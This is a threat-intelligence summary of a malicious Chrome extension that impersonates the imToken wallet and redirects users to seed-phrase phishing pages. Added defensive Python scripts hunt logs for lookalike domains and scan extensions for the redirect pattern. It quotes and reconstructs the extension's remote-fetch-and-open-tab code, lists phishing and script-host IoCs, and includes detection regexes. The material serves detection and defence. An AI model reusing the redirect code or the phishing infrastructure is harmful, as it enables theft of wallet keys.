Socket’s Threat Research Team discovered a malicious Chrome extension, lmToken Chromophore (extension ID bbhaganppipihlhjgaaeeeefbaoihcgi), that impersonates imToken while posing as a hex color visualizer and immediately redirects users to threat actor-controlled phishing pages. The extension fetches a remote target from a hardcoded JSONKeeper endpoint and opens lookalike domains that capture 12/24-word seed phrases or private keys, enabling immediate wallet takeover. #imToken #lmTokenChromophore
Keypoints
- The Chrome extension lmToken Chromophore (ID bbhaganppipihlhjgaaeeeefbaoihcgi) impersonates imToken and was published on February 2, 2026; it remains live with 39 weekly active users.
- On install and on click the extension auto-fetches a destination from a hardcoded JSONKeeper endpoint and opens a threat actor-controlled page instead of providing any legitimate functionality.
- The phishing domain chroomewedbstorre-detail-extension[.]com uses mixed-script homoglyphs to mimic imToken branding and funnels victims into credential-capture flows.
- Phishing pages request either a 12- or 24-word seed phrase or a plaintext private key and rely on externally hosted scripts (compute-fonts-appconnect.pages[.]dev) to validate and process inputs.
- After collecting secrets the workflow shows a fake password/setup sequence and then opens the legitimate token.im site as a decoy to reduce suspicion.
- Recommendations: restrict extension installs in sensitive profiles, verify wallet software via official channels, hunt for homoglyph/lookalike domains and remote-config endpoints, and treat any entered seed/private key as compromised and rotate keys immediately.
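The last recommendation above (hunt for homoglyph/lookalike domains and remote-config endpoints) can be run as a simple pass over proxy or DNS logs. The script below is an added example for this summary, not tooling from Socket's report: it refangs the IoC hosts listed on this page, decodes punycode (xn--) labels so a Cyrillic or Greek character in a label is visible, flags labels that mix Unicode scripts, and flags labels within one edit of a brand label such as "imtoken". The log lines, the extra brand "chromewebstore", and the host `imtоken.example` (Cyrillic о) are constructed for the demo.

```python
"""Hunt proxy/DNS logs for known IoC hosts, mixed-script labels and brand lookalikes.

Added example for this summary; not code from the Socket report. The log lines and the
brand list beyond "imtoken" are constructed/assumed.
"""
import re
import unicodedata
from typing import Dict, List, Optional

# Hosts from the summary's IoC list, kept defanged in source; refang() restores them.
IOC_HOSTS_DEFANGED = [
    "chroomewedbstorre-detail-extension[.]com",
    "www[.]jsonkeeper[.]com",
    "compute-fonts-appconnect[.]pages[.]dev",
]
# "imtoken" comes from the report; "chromewebstore" is an assumed extra brand to watch.
BRAND_LABELS = ["imtoken", "chromewebstore"]


def refang(host: str) -> str:
    return host.replace("[.]", ".").lower()


IOC_HOSTS = {refang(h) for h in IOC_HOSTS_DEFANGED}


def to_unicode_host(host: str) -> str:
    """Decode punycode labels so script analysis sees the real characters."""
    if "xn--" in host:
        try:
            return host.encode("ascii").decode("idna")
        except (UnicodeError, ValueError):
            return host
    return host


def script_of(ch: str) -> str:
    """Approximate the Unicode script from the character-name prefix (LATIN, GREEK, CYRILLIC...)."""
    if not ch.isalpha():
        return "COMMON"
    try:
        return unicodedata.name(ch).split(" ")[0]
    except ValueError:
        return "UNKNOWN"


def is_mixed_script(label: str) -> bool:
    """True when letters from more than one script appear in a single DNS label."""
    return len({script_of(c) for c in label} - {"COMMON"}) > 1


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(label: str) -> Optional[str]:
    """Return a brand label within one edit of this label after an ASCII fold.

    NFKD plus dropping non-ASCII characters handles accented Latin; a single cross-script
    substitution also ends up one edit away because the foreign character is dropped.
    """
    folded = unicodedata.normalize("NFKD", label).encode("ascii", "ignore").decode().lower()
    for brand in BRAND_LABELS:
        if levenshtein(folded, brand) <= 1:
            return brand
    return None


def analyze_host(raw_host: str) -> Dict[str, object]:
    host = to_unicode_host(raw_host.lower().rstrip("."))
    labels = host.split(".")[:-1]  # skip the TLD; check registrable and sub-labels
    look = next((b for b in map(lookalike_of, labels) if b), None)
    ioc = any(host == h or host.endswith("." + h) for h in IOC_HOSTS)
    return {"host": host, "ioc": ioc,
            "mixed_script": any(is_mixed_script(l) for l in labels), "lookalike_of": look}


HOST_RE = re.compile(r"\bhost=(\S+)")


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line whose host is an IoC, mixed-script, or a brand lookalike."""
    hits = []
    for line in lines:
        m = HOST_RE.search(line)
        if not m:
            continue
        rec = analyze_host(m.group(1))
        if rec["ioc"] or rec["mixed_script"] or rec["lookalike_of"]:
            rec["line"] = line
            hits.append(rec)
    return hits


IDN_HOST = "imt\u043eken.example"  # constructed: Cyrillic 'о' (U+043E) in place of Latin 'o'
SAMPLE_LOG = [  # constructed log lines; the three IoC hosts and paths are from the summary
    "2026-02-03T10:12:01Z src=10.0.0.5 host=www.jsonkeeper.com path=/b/KUWNE",
    "2026-02-03T10:12:02Z src=10.0.0.5 host=chroomewedbstorre-detail-extension.com path=/detail-bbhaganppipihlhjgaaeeeefbaoihcgi",
    "2026-02-03T10:12:04Z src=10.0.0.5 host=compute-fonts-appconnect.pages.dev path=/sjcl-bip39.js",
    "2026-02-03T10:12:09Z src=10.0.0.5 host=token.im path=/",
    f"2026-02-03T11:00:00Z src=10.0.0.7 host={IDN_HOST.encode('idna').decode('ascii')} path=/import",
    "2026-02-03T11:00:03Z src=10.0.0.7 host=lmtoken.example path=/recover",
    "2026-02-03T11:05:00Z src=10.0.0.8 host=fonts.googleapis.com path=/css",
]

if __name__ == "__main__":
    for rec in hunt(SAMPLE_LOG):
        print(rec["host"], {k: rec[k] for k in ("ioc", "mixed_script", "lookalike_of")})
```

Against the constructed log, the three IoC hosts, the Cyrillic-о host and `lmtoken.example` are flagged, while the legitimate decoy `token.im` and an unrelated CDN host pass. The script-name heuristic is coarse (it treats every "LATIN ..." name as one script and cannot see same-script confusables such as l/I), so it is a hunting filter, not a verdict.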
MITRE Techniques
- [T1195.002] Supply Chain Compromise – The extension was published in the Chrome Web Store to deliver malicious behavior via a trusted distribution channel. Quote: (‘Socket’s Threat Research Team uncovered a malicious Chrome extension, lmΤoken Chromophore … presented itself as a hex color visualizer in the Chrome Web Store.’)
- [T1176.001] Software Extensions: Browser Extensions – The threat delivered the attack through a browser extension whose primary runtime behavior is to redirect to remote phishing infrastructure. Quote: (‘background.js shows its true function. Rather than providing a legitimate interface, it retrieves a destination URL from a hardcoded JSON endpoint and opens a threat actor-controlled page.’)
- [T1059.007] Command and Scripting Interpreter: JavaScript – The extension uses JavaScript (background.js) to fetch remote configuration and open tabs that deliver phishing pages. Quote: (‘const endpoint = "https://www.jsonkeeper[.]com/b/KUWNE"; … chrome.tabs.create({ url: u });’)
- [T1204] User Execution – The redirect fires automatically on install and again on click, causing users to be exposed without expecting malicious behavior. Quote: (‘setTimeout(openStoredLink, 1000); // Auto-run shortly after install … chrome.action.onClicked.addListener(() => { openStoredLink(); // Re-run the same redirect on click }’)
- [T1036] Masquerading – The attackers used mixed-script Unicode homoglyphs and imitated storefront styling to masquerade as the legitimate imToken brand. Quote: (‘The page title uses mixed-script Unicode homoglyphs to imitate imToken.’)
- [T1656] Impersonation – The landing pages impersonate imToken to deceive victims into believing the import flow is legitimate. Quote: (‘The landing page impersonates imToken using mixed-script homoglyphs and funnels victims into credential-capture flows’)
- [T1566] Phishing – The lookalike pages present wallet import flows that directly request seed phrases or private keys to harvest credentials. Quote: (‘funnels victims into credential-capture flows that request either a 12 or 24 word seed phrase or a private key.’)
- [T1583.001] Acquire Infrastructure: Domains – The threat actor acquired and used lookalike domains for hosting phishing pages (e.g., chroomewedbstorre-detail-extension[.]com). Quote: (‘Primary Redirect Page: https://chroomewedbstorre-detail-extension[.]com/detail-bbhaganppipihlhjgaaeeeefbaoihcgi’)
- [T1583.006] Acquire Infrastructure: Web Services – The attacker used third-party web services as remote configuration and hosting points (e.g., jsonkeeper[.]com endpoint). Quote: (‘the extension fetches a destination URL from a hardcoded JSONKeeper endpoint (jsonkeeper[.]com/b/KUWNE)’)
- [T1056.003] Input Capture: Web Portal Capture – The phishing pages capture sensitive wallet inputs via web forms asking for seed phrases or private keys. Quote: (‘the site asks for a 12 or 24 word seed phrase as though it were part of a standard wallet recovery process.’)
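The T1176.001, T1059.007 and T1204 entries above describe one runtime pattern: a background script that fetches a destination from a hardcoded remote JSON endpoint and opens it in a new tab, on install and again on toolbar click. A defender can look for that pattern statically in any unpacked extension before it is allowed into a managed profile. The script below is an added example for this summary, not Socket's analysis tooling: it reads background scripts from manifest.json (MV3 service_worker or MV2 scripts), scores a handful of regex signals, extracts URLs, and reports whether the remote-fetch-plus-tabs.create combination is present. The signal weights are assumed, and the two sample extensions written by build_samples() are constructed: one modelled on the background.js quoted above (with a placeholder path on the jsonkeeper host), one a benign colour tool that only touches local storage.

```python
"""Static triage of unpacked Chrome extensions for the remote-config -> open-tab redirect pattern.

Added example for this summary; not Socket's tooling. Signal names, weights and the two
sample extensions built below are assumptions/constructed for the demo.
"""
import json
import os
import re
import tempfile
from typing import Dict, List

# (signal name, pattern, weight). Weights are assumed; tune them to your own baseline.
SIGNALS = [
    ("remote_fetch_literal", re.compile(r"\bfetch\s*\(\s*[\"'`]https?://"), 2),
    ("remote_fetch_variable", re.compile(r"\bfetch\s*\(\s*[A-Za-z_$][\w$]*\s*\)"), 1),
    ("opens_tab", re.compile(r"chrome\.tabs\.create\s*\("), 2),
    ("runs_on_install", re.compile(r"onInstalled|\bsetTimeout\s*\("), 1),
    ("action_click", re.compile(r"chrome\.(action|browserAction)\.onClicked"), 1),
]
URL_RE = re.compile(r"https?://[^\s\"'`)]+")
# Config-hosting services: jsonkeeper.com is from the report, pastebin.com is an assumed addition.
CONFIG_HOSTS = ("jsonkeeper.com", "pastebin.com")


def background_scripts(ext_dir: str) -> List[str]:
    """Resolve background script paths from manifest.json (MV3 service_worker or MV2 scripts)."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as f:
        bg = json.load(f).get("background", {})
    names = [bg["service_worker"]] if "service_worker" in bg else []
    names += bg.get("scripts", [])
    return [os.path.join(ext_dir, n) for n in names]


def triage(ext_dir: str) -> Dict[str, object]:
    """Score one unpacked extension and report whether it shows the redirect pattern."""
    hits: List[str] = []
    urls: List[str] = []
    score = 0
    for path in background_scripts(ext_dir):
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as f:
            src = f.read()
        for name, rx, weight in SIGNALS:
            if rx.search(src):
                hits.append(name)
                score += weight
        urls += URL_RE.findall(src)
    if any(h in u for u in urls for h in CONFIG_HOSTS):
        hits.append("config_on_paste_service")
        score += 2
    # The redirect pattern needs both a remote fetch and tab creation; either alone is common.
    fetches = {"remote_fetch_literal", "remote_fetch_variable"}
    redirect = "opens_tab" in hits and bool(fetches & set(hits))
    return {"hits": hits, "urls": urls, "score": score, "redirect_pattern": redirect}


# Constructed sample modelled on the background.js quoted in the report; the path is a placeholder.
SUSPICIOUS_BG = '''
const endpoint = "https://www.jsonkeeper.com/b/PLACEHOLDER";
async function openStoredLink() {
  const res = await fetch(endpoint);
  const { u } = await res.json();
  chrome.tabs.create({ url: u });
}
setTimeout(openStoredLink, 1000);
chrome.action.onClicked.addListener(() => { openStoredLink(); });
'''
# Constructed benign sample: a colour tool that only writes to local storage.
BENIGN_BG = '''
chrome.runtime.onInstalled.addListener(() => {
  chrome.storage.local.set({ palette: ["#ff0000", "#00ff00"] });
});
'''


def build_samples() -> Dict[str, str]:
    """Write the two constructed extensions to a temp dir and return their paths by name."""
    root = tempfile.mkdtemp(prefix="ext-triage-")
    out: Dict[str, str] = {}
    for name, body in (("suspicious", SUSPICIOUS_BG), ("benign", BENIGN_BG)):
        d = os.path.join(root, name)
        os.makedirs(d)
        with open(os.path.join(d, "manifest.json"), "w", encoding="utf-8") as f:
            json.dump({"manifest_version": 3, "name": name,
                       "background": {"service_worker": "background.js"}}, f)
        with open(os.path.join(d, "background.js"), "w", encoding="utf-8") as f:
            f.write(body)
        out[name] = d
    return out


if __name__ == "__main__":
    for name, d in build_samples().items():
        print(name, triage(d))
```

Point `triage()` at the unpacked directories under a Chrome profile's Extensions folder to baseline what is already installed; the extracted URL list is also the quickest way to spot a paste-style config service that a colour picker has no reason to contact.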
Indicators of Compromise
- [Extension ID] Malicious Chrome extension identifier – bbhaganppipihlhjgaaeeeefbaoihcgi
- [Publisher Email] Threat actor account used to register the extension – liomassi19855@gmail[.]com
- [Remote Configuration Endpoint] Off-box JSON endpoint used to retarget victims – https://www[.]jsonkeeper[.]com/b/KUWNE
- [Phishing Domains/Pages] Primary redirect and landing pages used to capture credentials – chroomewedbstorre-detail-extension[.]com/detail-bbhaganppipihlhjgaaeeeefbaoihcgi, and paths for Seed-Phrase and Private-Key captures
- [External Script Hosts] Externally hosted JavaScript supporting mnemonic/private-key processing – compute-fonts-appconnect[.]pages[.]dev/sjcl-bip39.js, compute-fonts-appconnect[.]pages[.]dev/formScript.js, and 2 more scripts
- [Decoy/Legitimate Site] Real site opened as a decoy after theft – https://token.im
Read more: https://socket.dev/blog/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects